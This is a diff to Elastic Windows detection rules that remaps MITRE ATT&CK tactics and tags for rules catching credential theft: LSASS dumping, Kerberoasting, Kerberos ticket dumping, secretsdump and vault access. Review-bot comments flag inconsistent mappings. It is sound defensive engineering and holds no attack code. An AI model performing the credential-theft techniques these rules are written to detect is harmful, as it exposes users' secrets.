@@ -151,26 +151,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.008" +name = "Network Provider DLL" +reference = "https://attack.mitre.org/techniques/T1556/008/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.008" +name = "Network Provider DLL" +reference = "https://attack.mitre.org/techniques/T1556/008/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/credential_access_posh_invoke_ninjacopy.toml b/rules/windows/credential_access_posh_invoke_ninjacopy.toml index 756fcb25eba..80fbae1a397 100644 --- a/rules/windows/credential_access_posh_invoke_ninjacopy.toml +++ b/rules/windows/credential_access_posh_invoke_ninjacopy.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/23" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -111,14 +111,7 @@ references = [ risk_score = 73 rule_id = "b8386923-b02c-4b94-986a-d223d9b01f88" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -142,10 +135,12 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" 
@@ -156,43 +151,41 @@ id = "T1003.003" name = "NTDS" reference = "https://attack.mitre.org/techniques/T1003/003/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1006" +name = "Direct Volume Access" +reference = "https://attack.mitre.org/techniques/T1006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1006" -name = "Direct Volume Access" -reference = "https://attack.mitre.org/techniques/T1006/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_kerb_ticket_dump.toml b/rules/windows/credential_access_posh_kerb_ticket_dump.toml index 8039fe58cfc..e73e3c3e9ab 100644 --- a/rules/windows/credential_access_posh_kerb_ticket_dump.toml +++ b/rules/windows/credential_access_posh_kerb_ticket_dump.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/26" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -126,40 +126,16 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_minidump.toml b/rules/windows/credential_access_posh_minidump.toml index f417da3fdb8..6839473f031 100644 --- a/rules/windows/credential_access_posh_minidump.toml +++ b/rules/windows/credential_access_posh_minidump.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/05" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
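Review bot: This hunk resolves the tag/threat mismatch for credential_access_posh_kerb_ticket_dump by deleting the whole Execution/T1059.001 entry, whereas the other PowerShell script-block rules in this PR (posh_minidump, posh_relay_tools, posh_request_ticket, posh_invoke_ninjacopy) resolve it the other way by adding `"Tactic: Execution"` to `tags` and keeping T1059.001; credential_access_posh_veeam_sql further down is handled like this one. All of these rules fire on the same PowerShell script-block source, so the Execution mapping is either meaningful for all of them or for none. Picking one convention, or stating why these two differ, would stop the new tag/tactic test from locking in an arbitrary split.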
@@ -112,14 +112,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Data Source: PowerShell Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] timestamp_override = "event.ingested" type = "query" @@ -130,40 +123,39 @@ event.category:process and host.os.type:windows and powershell.file.script_block [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_relay_tools.toml b/rules/windows/credential_access_posh_relay_tools.toml index 87be03b98ba..bb431c9bf71 100644 --- a/rules/windows/credential_access_posh_relay_tools.toml +++ b/rules/windows/credential_access_posh_relay_tools.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/03/27" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -98,14 +98,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Data Source: PowerShell Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Execution", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] timestamp_override = "event.ingested" type = "query" 
@@ -125,52 +118,57 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" +[[rule.threat.technique.subtechnique]] +id = "T1557.001" +name = "LLMNR/NBT-NS Poisoning and SMB Relay" +reference = "https://attack.mitre.org/techniques/T1557/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.002" name = "Pass the Hash" reference = "https://attack.mitre.org/techniques/T1550/002/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_request_ticket.toml b/rules/windows/credential_access_posh_request_ticket.toml index 3c2c8435952..033602a029e 100644 --- a/rules/windows/credential_access_posh_request_ticket.toml +++ b/rules/windows/credential_access_posh_request_ticket.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/24" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -98,14 +98,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t
 Setup instructions: https://ela.st/powershell-logging-setup
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Resources: Investigation Guide",
- "Data Source: PowerShell Logs",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -123,45 +116,39 @@ event.category:process and host.os.type:windows and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1003"
-name = "OS Credential Dumping"
-reference = "https://attack.mitre.org/techniques/T1003/"
 [[rule.threat.technique]]
 id = "T1558"
 name = "Steal or Forge Kerberos Tickets"
 reference = "https://attack.mitre.org/techniques/T1558/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1558.003"
 name = "Kerberoasting"
 reference = "https://attack.mitre.org/techniques/T1558/003/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/credential_access_posh_veeam_sql.toml b/rules/windows/credential_access_posh_veeam_sql.toml
index fa457a50f0f..df4b429b3b9 100644
--- a/rules/windows/credential_access_posh_veeam_sql.toml
+++ b/rules/windows/credential_access_posh_veeam_sql.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/03/14"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/01/26"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -140,40 +140,16 @@ event.category:process and host.os.type:windows and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1003"
-name = "OS Credential Dumping"
-reference = "https://attack.mitre.org/techniques/T1003/"
 [[rule.threat.technique]]
 id = "T1555"
 name = "Credentials from Password Stores"
 reference = "https://attack.mitre.org/techniques/T1555/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.001"
-name = "PowerShell"
-reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml b/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml
index bb46707c121..c5883618cf0 100644
--- a/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml
+++ b/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/04/30"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
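Review bot: The `@@ -140,40 +140,16 @@` hunk drops the whole Execution `[[rule.threat]]` entry (T1059.001 / TA0002) from credential_access_posh_veeam_sql.toml, but this file section contains no tags hunk, so if the rule's `tags` array still carries `"Tactic: Execution"` that tag is now an orphan with no backing threat entry. The same pattern appears where the Execution entry is removed from credential_access_suspicious_lsass_access_memdump.toml and credential_access_veeam_backup_dll_imageload.toml, and where the Defense Evasion entry is removed from credential_access_wbadmin_ntds.toml; none of those sections has a tags change in this diff either. Please confirm the `tags` of those four files against their new threat blocks before merge, or regenerate the tags from the threat mapping so the two cannot drift.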
@@ -68,21 +68,7 @@ references = [
 risk_score = 73
 rule_id = "4682fd2c-cfae-47ed-a543-9bed37657aa6"
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Tactic: Defense Evasion",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Data Source: Windows Security Event Logs",
- "Data Source: Microsoft Defender for Endpoint",
- "Data Source: Sysmon",
- "Data Source: SentinelOne",
- "Data Source: Crowdstrike",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -100,31 +86,13 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1212"
-name = "Exploitation for Credential Access"
-reference = "https://attack.mitre.org/techniques/T1212/"
+[[rule.threat.technique]]
+id = "T1187"
+name = "Forced Authentication"
+reference = "https://attack.mitre.org/techniques/T1187/"
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1218"
-name = "System Binary Proxy Execution"
-reference = "https://attack.mitre.org/techniques/T1218/"
-[[rule.threat.technique.subtechnique]]
-id = "T1218.011"
-name = "Rundll32"
-reference = "https://attack.mitre.org/techniques/T1218/011/"
-
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/windows/credential_access_remote_sam_secretsdump.toml b/rules/windows/credential_access_remote_sam_secretsdump.toml
index f3fde2b0828..96822ab9c0a 100644
--- a/rules/windows/credential_access_remote_sam_secretsdump.toml
+++ b/rules/windows/credential_access_remote_sam_secretsdump.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/03/01"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2024/05/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -67,15 +67,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest
 For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Lateral Movement",
- "Tactic: Credential Access",
- "Resources: Investigation Guide",
- "Data Source: Elastic Defend",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Resources: Investigation Guide", "Data Source: Elastic Defend"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -89,31 +81,18 @@ file where host.os.type == "windows" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1003.002"
 name = "Security Account Manager"
 reference = "https://attack.mitre.org/techniques/T1003/002/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1021"
-name = "Remote Services"
-reference = "https://attack.mitre.org/techniques/T1021/"
-
-
-[rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
-
diff --git a/rules/windows/credential_access_saved_creds_vault_winlog.toml b/rules/windows/credential_access_saved_creds_vault_winlog.toml
index 2b62541ede2..6435dd1f66a 100644
--- a/rules/windows/credential_access_saved_creds_vault_winlog.toml
+++ b/rules/windows/credential_access_saved_creds_vault_winlog.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/08/30"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2025/11/14"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -87,24 +87,18 @@ sequence by winlog.computer_name, winlog.process.pid with maxspan=1s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1003"
-name = "OS Credential Dumping"
-reference = "https://attack.mitre.org/techniques/T1003/"
 [[rule.threat.technique]]
 id = "T1555"
 name = "Credentials from Password Stores"
 reference = "https://attack.mitre.org/techniques/T1555/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1555.004"
 name = "Windows Credential Manager"
 reference = "https://attack.mitre.org/techniques/T1555/004/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
diff --git a/rules/windows/credential_access_saved_creds_vaultcmd.toml b/rules/windows/credential_access_saved_creds_vaultcmd.toml
index bcb205d1e7a..7e05143b527 100644
--- a/rules/windows/credential_access_saved_creds_vaultcmd.toml
+++ b/rules/windows/credential_access_saved_creds_vaultcmd.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/01/19"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -94,24 +94,18 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1003"
-name = "OS Credential Dumping"
-reference = "https://attack.mitre.org/techniques/T1003/"
 [[rule.threat.technique]]
 id = "T1555"
 name = "Credentials from Password Stores"
 reference = "https://attack.mitre.org/techniques/T1555/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1555.004"
 name = "Windows Credential Manager"
 reference = "https://attack.mitre.org/techniques/T1555/004/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
diff --git a/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml b/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml
index 6746281b95d..93a9e7334eb 100644
--- a/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml
+++ b/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/01/27"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2025/11/14"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -75,17 +75,7 @@ Audit Authorization Policy Change (Success,Failure)
 ```
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Tactic: Persistence",
- "Data Source: Active Directory",
- "Resources: Investigation Guide",
- "Use Case: Active Directory Monitoring",
- "Data Source: Windows Security Event Logs",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -96,26 +86,26 @@ event.code:4704 and host.os.type:"windows" and winlog.event_data.PrivilegeList:"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1558"
-name = "Steal or Forge Kerberos Tickets"
-reference = "https://attack.mitre.org/techniques/T1558/"
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/windows/credential_access_shadow_credentials.toml b/rules/windows/credential_access_shadow_credentials.toml
index f2acb0609bf..8d7dfb8c6b0 100644
--- a/rules/windows/credential_access_shadow_credentials.toml
+++ b/rules/windows/credential_access_shadow_credentials.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/01/26"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2025/11/14"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
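Review bot: The `@@ -96,26 +86,26 @@` hunk removes the only Credential Access mapping (T1558 / TA0006) from credential_access_seenabledelegationprivilege_assigned_to_user.toml, so a rule whose path and file-name prefix are `credential_access_` no longer maps to or tags that tactic; the same happens to credential_access_shadow_credentials.toml (T1556 dropped) and credential_access_spn_attribute_modified.toml (T1558.003 Kerberoasting dropped) in the following hunks. For the SPN rule in particular, adding an SPN to an account is the step that makes the account Kerberoastable, so keeping the T1558.003 entry alongside the new T1098 / Persistence mapping looks more faithful to why the rule exists than replacing it. If the intent is that only the account modification itself is detected, please state that rationale in the PR description, and consider whether the `credential_access_` file names should follow the new mappings so the naming convention visible in this diff keeps meaning something.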
@@ -85,16 +85,7 @@ Set-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType W
 ```
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Data Source: Active Directory",
- "Resources: Investigation Guide",
- "Use Case: Active Directory Monitoring",
- "Data Source: Windows Security Event Logs",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -107,14 +98,26 @@ event.code:"5136" and host.os.type:"windows" and winlog.event_data.AttributeLDAP
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1556"
-name = "Modify Authentication Process"
-reference = "https://attack.mitre.org/techniques/T1556/"
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
 [rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/windows/credential_access_spn_attribute_modified.toml b/rules/windows/credential_access_spn_attribute_modified.toml
index f7b5e02f1bd..756dc3f5d77 100644
--- a/rules/windows/credential_access_spn_attribute_modified.toml
+++ b/rules/windows/credential_access_spn_attribute_modified.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/02/22"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2025/11/14"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -84,16 +84,7 @@ Set-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType W
 ```
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Data Source: Active Directory",
- "Resources: Investigation Guide",
- "Use Case: Active Directory Monitoring",
- "Data Source: Windows Security Event Logs",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -106,19 +97,13 @@ event.code:5136 and host.os.type:"windows" and winlog.event_data.OperationType:"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1558"
-name = "Steal or Forge Kerberos Tickets"
-reference = "https://attack.mitre.org/techniques/T1558/"
-[[rule.threat.technique.subtechnique]]
-id = "T1558.003"
-name = "Kerberoasting"
-reference = "https://attack.mitre.org/techniques/T1558/003/"
-
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
 [rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/windows/credential_access_suspicious_lsass_access_memdump.toml b/rules/windows/credential_access_suspicious_lsass_access_memdump.toml
index 53f21c1ebca..94f860c2038 100644
--- a/rules/windows/credential_access_suspicious_lsass_access_memdump.toml
+++ b/rules/windows/credential_access_suspicious_lsass_access_memdump.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/10/07"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -96,31 +96,18 @@ process where host.os.type == "windows" and event.code == "10" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1003.001"
 name = "LSASS Memory"
 reference = "https://attack.mitre.org/techniques/T1003/001/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1106"
-name = "Native API"
-reference = "https://attack.mitre.org/techniques/T1106/"
-
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
diff --git a/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml b/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml
index e63eabdab29..5fe01b915f7 100644
--- a/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml
+++ b/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/02/16"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2025/11/14"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
